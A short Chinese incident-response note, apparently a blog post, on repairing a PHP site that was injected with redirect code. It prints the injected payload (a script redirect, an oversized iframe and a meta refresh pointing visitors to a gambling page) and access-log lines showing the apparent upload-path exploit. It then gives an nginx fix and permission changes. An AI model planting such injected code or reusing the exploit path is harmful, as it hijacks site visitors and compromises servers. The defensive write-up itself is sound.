被注入木马的漏洞，修复过程

1.文件被注入的内容：
'<script>{
window.location.href="http://www.22hy.com/html/livedealer.html?pid=1"
}</script>
<iframe src="http://www.22hy.com/html/livedealer.html?pid=1" align=center width="1440" 
height="6500" ></iframe>
<meta http-equiv="refresh" content="0.1;URL=http://www.18hy.com/html/livedealer.html?pid=1">'


2.查看被修改文件的时间
[roots]$ stat index.php.bad 
  File: "index.php.bad"
  Size: 648       Blocks: 8          IO Block: 4096   普通文件
Device: fd00h/64768d Inode: 6553641     Links: 1
Access: (0755/-rwxr-xr-x)  Uid: (  502/     www)   Gid: (    0/    root)
Access: 2013-12-02 15:12:34.167243911 +0800
Modify: 2013-11-25 11:20:32.659258572 +0800
Change: 2013-11-29 18:24:29.209265041 +0800


3.查看服务器(linux)日志
192.168.11.10 - - [25/Nov/2013:14:40:18 +0800] "POST /uc_server/data/tmp/upload30540323.gif/.php HTTP/1.0" 200 14 "http://bbs.navidog.cn" "Mozilla/5.0 (compatible; Baiduspider/2.0; +spider)"
192.168.11.10 - - [25/Nov/2013:14:40:18 +0800] "POST /uc_server/data/tmp/upload30540323.gif/.php HTTP/1.0" 200 381 "http://bbs.navidog.cn" "Mozilla/5.0 (compatible; Baiduspider/2.0; +spider)"


4.根据日志屏蔽漏洞
location ~ ^(.+\.php)(.*)$
{
if ($request_filename ~* (.*)\.php) {
set $php_url $1;
}
if (!-e $php_url.php) {
return 403;
}
fastcgi_pass unix:/tmp/php-cgi.sock;
fastcgi_index index.php;
fastcgi_split_path_info ^(.+\.php)(.*)$;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;
include fastcgi.conf;
}


5.修改服务器文件的权限：缓存有写的权限，php文件只有读和执行权限

6.更改用户，启动nginx的用户是root，nginx的子线程访问用户是www，目录权限的所有者是other

参考网站：

http://zhumeng8337797.blog.163.com/blog/static/1007689142011815642384/

http://blog.phpdr.net/nginx-try-files.html